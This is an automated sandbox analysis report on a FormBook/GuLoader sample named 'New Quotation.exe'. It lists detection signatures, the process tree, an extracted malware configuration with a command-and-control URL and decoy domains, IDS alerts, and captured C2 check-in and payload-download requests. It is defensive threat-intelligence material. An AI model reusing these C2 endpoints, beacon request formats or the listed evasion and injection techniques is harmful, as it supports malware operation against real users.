Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Quotation.exe

Overview

General Information

Sample Name:New Quotation.exe
Analysis ID:643108
MD5:c69011df1fdebc08f5098a7f4d6098d2
SHA1:bf2f7b8a13510e3086862c1e308734654269d35a
SHA256:bfc7d8f7a7cca1215bd7dd211488ce0220cb4ca66b6d59a3eb8bc69047e6ac1d
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Uses netsh to modify the Windows network and firewall settings
Tries to detect Any.run
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • New Quotation.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\New Quotation.exe" MD5: C69011DF1FDEBC08F5098A7F4D6098D2)
    • New Quotation.exe (PID: 856 cmdline: "C:\Users\user\Desktop\New Quotation.exe" MD5: C69011DF1FDEBC08F5098A7F4D6098D2)
      • explorer.exe (PID: 4924 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • autoconv.exe (PID: 2612 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 469594005E3B94C5945BCCE7FC521C05)
        • autochk.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 95127C028063423E1253BD0C8CD6C9CB)
        • autofmt.exe (PID: 4124 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: ABC9F7DAB410FE452D2D90C9960077BE)
        • netsh.exe (PID: 3456 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 1760 cmdline: /c del "C:\Users\user\Desktop\New Quotation.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lcm-brokers.com/a2c8/"], "decoy": ["vijaykymar.world", "gachhongson.com", "axiomalignarcoord.com", "belajarakuntansipajak.com", "gbcargo.net", "animehub.store", "yicekasyno.xyz", "leasing.estate", "chaostoclaritybook.com", "thebootstrappedlist.com", "favorite.wtf", "aeiphx.site", "opendesign-dh.com", "somosnuecru.com", "indiatravel.xyz", "onlinesinavsistemi.xyz", "investoxer.com", "gekrom.com", "outletgals.com", "escoladedho.com", "wesidetrip.com", "solaksa.net", "morbebscience.com", "bkbc.site", "lovol-partner.com", "jbyachtcharter.online", "revealbycharlotte.com", "cardviews.net", "informsite-cargo.xyz", "micropointlinks.com", "patrickgoetelen.com", "ranabroimpexp.com", "plermis.online", "8584hu.com", "ibsfodmap.com", "cocodetteexciple.com", "onlyvalo.com", "sjhzq.com", "freedomacceleratorlive.com", "siaff-consultores.com", "soussecloud.com", "jc7transports.com", "rlxijvrd.com", "marynahandysh.art", "puude.online", "jakade.com", "dipbet232.com", "futuristicwanderingrough.xyz", "healthy-masks.com", "aoqu888.com", "shegfs.xyz", "universalbad.com", "k07yy.com", "ambros-severing.com", "kasitah.com", "hellodamia.com", "tuinkunst.online", "lax0.com", "theparkourspot.net", "slotasian88.xyz", "eaubansan.com", "coworkingvic.com", "qwefgh.com", "hanju2020.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5849:$sqlite3step: 68 34 1C 7B E1
    • 0x595c:$sqlite3step: 68 34 1C 7B E1
    • 0x5878:$sqlite3text: 68 38 2A 90 C5
    • 0x599d:$sqlite3text: 68 38 2A 90 C5
    • 0x588b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 18 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.11.20172.105.250.3449787802031449 06/10/22-07:57:15.871020
      SID:2031449
      Source Port:49787
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20116.204.133.14849790802031412 06/10/22-07:57:57.610744
      SID:2031412
      Source Port:49790
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.208.214.69.4849786802031412 06/10/22-07:56:57.136375
      SID:2031412
      Source Port:49786
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20116.204.133.14849790802031453 06/10/22-07:57:57.610744
      SID:2031453
      Source Port:49790
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20216.58.212.14749779802031449 06/10/22-07:54:52.807904
      SID:2031449
      Source Port:49779
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20172.105.250.3449787802031412 06/10/22-07:57:15.871020
      SID:2031412
      Source Port:49787
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20116.204.133.14849790802031449 06/10/22-07:57:57.610744
      SID:2031449
      Source Port:49790
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.208.214.69.4849786802031453 06/10/22-07:56:57.136375
      SID:2031453
      Source Port:49786
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20172.105.250.3449787802031453 06/10/22-07:57:15.871020
      SID:2031453
      Source Port:49787
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2046.38.243.23449784802031412 06/10/22-07:56:15.261794
      SID:2031412
      Source Port:49784
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2046.38.243.23449784802031453 06/10/22-07:56:15.261794
      SID:2031453
      Source Port:49784
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.208.214.69.4849786802031449 06/10/22-07:56:57.136375
      SID:2031449
      Source Port:49786
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2046.38.243.23449784802031449 06/10/22-07:56:15.261794
      SID:2031449
      Source Port:49784
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20216.58.212.14749779802031412 06/10/22-07:54:52.807904
      SID:2031412
      Source Port:49779
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20216.58.212.14749779802031453 06/10/22-07:54:52.807904
      SID:2031453
      Source Port:49779
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: New Quotation.exeVirustotal: Detection: 10%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: 17.2.netsh.exe.36ef840.4.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 17.2.netsh.exe.9e5988.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lcm-brokers.com/a2c8/"], "decoy": ["vijaykymar.world", "gachhongson.com", "axiomalignarcoord.com", "belajarakuntansipajak.com", "gbcargo.net", "animehub.store", "yicekasyno.xyz", "leasing.estate", "chaostoclaritybook.com", "thebootstrappedlist.com", "favorite.wtf", "aeiphx.site", "opendesign-dh.com", "somosnuecru.com", "indiatravel.xyz", "onlinesinavsistemi.xyz", "investoxer.com", "gekrom.com", "outletgals.com", "escoladedho.com", "wesidetrip.com", "solaksa.net", "morbebscience.com", "bkbc.site", "lovol-partner.com", "jbyachtcharter.online", "revealbycharlotte.com", "cardviews.net", "informsite-cargo.xyz", "micropointlinks.com", "patrickgoetelen.com", "ranabroimpexp.com", "plermis.online", "8584hu.com", "ibsfodmap.com", "cocodetteexciple.com", "onlyvalo.com", "sjhzq.com", "freedomacceleratorlive.com", "siaff-consultores.com", "soussecloud.com", "jc7transports.com", "rlxijvrd.com", "marynahandysh.art", "puude.online", "jakade.com", "dipbet232.com", "futuristicwanderingrough.xyz", "healthy-masks.com", "aoqu888.com", "shegfs.xyz", "universalbad.com", "k07yy.com", "ambros-severing.com", "kasitah.com", "hellodamia.com", "tuinkunst.online", "lax0.com", "theparkourspot.net", "slotasian88.xyz", "eaubansan.com", "coworkingvic.com", "qwefgh.com", "hanju2020.com"]}
      Source: New Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\New Quotation.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Stjernedagenes95Jump to behavior
      Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.11.20:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.65:443 -> 192.168.11.20:49765 version: TLS 1.2
      Source: New Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: netsh.pdb source: New Quotation.exe, 00000007.00000003.49630556665.000000001DC51000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49634596314.0000000000120000.00000040.10000000.00040000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49630437748.000000001DC41000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: New Quotation.exe, 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49333316862.000000001D443000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49339217288.000000001D5F9000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49639082986.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49633352694.0000000002E44000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: netsh.pdbGCTL source: New Quotation.exe, 00000007.00000003.49630556665.000000001DC51000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49634596314.0000000000120000.00000040.10000000.00040000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49630437748.000000001DC41000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: New Quotation.exe, New Quotation.exe, 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49333316862.000000001D443000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49339217288.000000001D5F9000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49639082986.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49633352694.0000000002E44000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi17_2_00727330

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 99.83.175.80 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 216.58.212.147 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 93.89.226.17 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 116.204.133.148 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.220 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.105.250.34 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.219.125.79 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 43.225.157.245 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 176.53.69.151 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 8.214.69.48 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.45.67.192 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 82.98.135.44 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.104.28.238 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 152.228.155.71 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80Jump to behavior
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 216.58.212.147:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 216.58.212.147:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 216.58.212.147:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 46.38.243.234:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 46.38.243.234:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 46.38.243.234:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 8.214.69.48:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 8.214.69.48:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 8.214.69.48:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 172.105.250.34:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 172.105.250.34:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 172.105.250.34:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49790 -> 116.204.133.148:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49790 -> 116.204.133.148:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49790 -> 116.204.133.148:80
      Performs DNS queries to domains with low reputation
      Source: DNS query: www.onlinesinavsistemi.xyz
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.lcm-brokers.com/a2c8/
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewASN Name: TR-FBSTR TR-FBSTR
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=9EsqhgYJ7gNCuyDVUAbmGxK1wm9jM9gbBQ+iilDrWSOhprOSHc5xNSdxhhACbSLapwdF HTTP/1.1Host: www.animehub.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=8QcX/9a8ci5Vn1nUgpALxBO0i5LJh4pOXEYLQ5+l8i6jeOxjgCEcajHz4AJyUtveARY+&6lbL=qTfTz0 HTTP/1.1Host: www.somosnuecru.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=blgq+MwijlPLtn18EK/mFFgLQ7saUAegRg4nsKXdDvXqvzc0FmI2dz5pRjRE3XI8Zh+s HTTP/1.1Host: www.cardviews.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=C4QtL123UqrFY0ZIvsissWy0gTwQZvavuGdAMd62WneJYeLezb4bPLeN5mqTMt96tJ/I HTTP/1.1Host: www.belajarakuntansipajak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=hAb1bfA3kdRzRDaFO/Xjxrg/eigTyfVAv6myO+nVVHigx1EEc3JcIrberUsYxkjlMdL+&6lbL=qTfTz0 HTTP/1.1Host: www.cocodetteexciple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=idqIzuqk2a5vjoGSbf9Bcwe0DWiZK+YeMoSyFHNnMaplLV0sCAEI7n55HlOgc8kmWb4X HTTP/1.1Host: www.outletgals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=XJueD6+RsCamebg+m2IDevgDgX6JK6+fg1om2YuoQAjiRITTUmGQ1TK81l5L26OUxDMt&6lbL=qTfTz0 HTTP/1.1Host: www.bkbc.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=Le51HqdCnUjRonUOENSF5PHY57eFe7/AO9vFjh8TXkRU4Y1PyjhZUj1LAkJkXoaSSV0M HTTP/1.1Host: www.soussecloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=cnYzLO/iOmLQ80nbybEBKd6xv0BZ3jX95SMYu5eAQoFQzMXmCHJOFJgiGACm/n2x6SPU HTTP/1.1Host: www.rlxijvrd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=ZOJEaTbg68I2C/h4CsFFsOVO6bUFraiXKSxh6HANJbUJoISOJ9GPYTEDhfBXlhmSduAT&6lbL=qTfTz0 HTTP/1.1Host: www.lcm-brokers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=MpN0czAuQ6QXUx2sg2pWHBUGWBvsIkeMjItV5tnwLHMMLUdJVGF+gg01BF91m3Q+VFle HTTP/1.1Host: www.solaksa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=WTCZorkujDQqRjcxlgclBW8LL1l4Q4yZC6MlAjn7yJTWeUkxqEHcvOf8DmefZeR6VxbM&6lbL=qTfTz0 HTTP/1.1Host: www.hanju2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=/K5hgtIqUus/DloXEMxkOj6GgPGVswIXrDjH+XzUkbkk6TDv4WNyBCGfY3zU+FC2J3jS HTTP/1.1Host: www.ranabroimpexp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=j/Ps+a/VuX4QoBvcMreOK2UI1STzAixbxZBALrwc64bjPCb9njwh7+nFlquJ6zY9vl55&6lbL=qTfTz0 HTTP/1.1Host: www.onlinesinavsistemi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=iEw+cJwvtv+bQOCPj3F7KZu21Rs9fexzItYbFNxodrXSDd9r0rFLMIC1b94eFbixOM9K&YPcp=8p-DO HTTP/1.1Host: www.lax0.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=AplE9LD72/xgVAg7E91FKL+rPo1U0v89Attzn1Fzu6gMFI5vxyD2OErKmqoT1DuyJNiH&YPcp=8p-DO HTTP/1.1Host: www.tuinkunst.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 99.83.175.80 99.83.175.80
      Source: Joe Sandbox ViewIP Address: 99.83.175.80 99.83.175.80
      Source: Joe Sandbox ViewIP Address: 93.89.226.17 93.89.226.17
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/do4pmedip159iep2454spmaehd0b8seb/1654840275000/03850461078914778055/*/1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-as-docs.googleusercontent.comConnection: Keep-Alive
      Source: unknownNetwork traffic detected: IP country count 12
